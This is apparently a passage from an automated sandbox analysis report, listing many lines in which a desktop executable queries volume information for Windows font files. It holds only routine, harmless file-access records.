Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
